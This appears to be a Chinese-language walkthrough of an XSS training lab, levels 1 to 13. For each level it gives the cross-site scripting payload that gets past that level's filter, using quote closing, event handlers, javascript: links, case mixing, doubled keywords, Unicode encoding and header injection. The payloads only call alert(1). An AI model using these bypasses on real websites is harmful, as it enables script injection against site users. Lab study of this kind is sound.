XSS Lab
Level-1
payload:
?name=<script>alert(1);</script>
Level-2
用1的payload查看源代码发现 '/'和''都被过滤转义了
放弃 script< 类
还可以用 onclick=alert(1)这种
输入后查看源代码 发现需要 闭合 value=" 后面的引号 然后再加上"//"将后面注释掉
payload:
?keyword=" onclick=alert(1) //
Level-3
与2类似 只是闭合的是单引号而已
payload:
?keyword=' onclick=alert(1) //
Level-4
跟2 一样 ……
Level-5
尝试发现 script on 都被过滤掉了
我们可以选择
<a href="javascript:alert(1)">
这种形式
观察源码发现除了要闭合引号外还要闭合 '>'
payload:
?keyword=" ><a href="javascript:alert(1)">//
Level-6
能试的都试了还是不行
看WP说是 大小写绕过
payload: 随便大小写怎么绕都可以
?keyword=" ><sCript>alert(1);</scRipt>//
实战记得尝试大小写绕过!!!
Level-7
能试的关键词都被过滤了个干净
观察源码发现 直接是置为""了 所以可以尝试 双写绕过
payload:
?keyword=" ><scrscriptipt>alert(1)</scripscriptt> //
Level-8
emmmm...
源码有个
<a href="">
尝试注入到href中可是所有关键词都被改写了
尝试Unicode 编码后提交
再点击 友情链接即可激活弹窗
Level-9
与8一样是超链接跳转 只是这题必须要求有 http:// 格式
所以可以把 JavaScript语句写前面 用 // 注释掉后面的 http://
还是需要对语句进行unicode 编码
其实干脆都Unicode编码算了...
payload:
javascript:alert(1) //http://127.0.0.1
Level-10
观察源码发现有几个 hidden类型的可以用来触发XSS
尝试后发现 t_sort 可行 构造payload(注意引号的闭合)
?t_sort=" type="text" onclick=alert(1) //
然后点击出现的文本框即可
Level-11
有个 t_ref 用burpsuite抓包后发现是 refer的值
refer存在XSS注入
所以直接构造refer:
" type="text" onclick=alert(1) //
点击文本框即可
Level-12
User-Agent 存在XSS注入
构造 UA:
" type="text" onclick=alert(1) //
点击文本框即可
Level-13
Cookie 存在XSS注入
构造Cookie:
" type="text" onclick=alert(1) //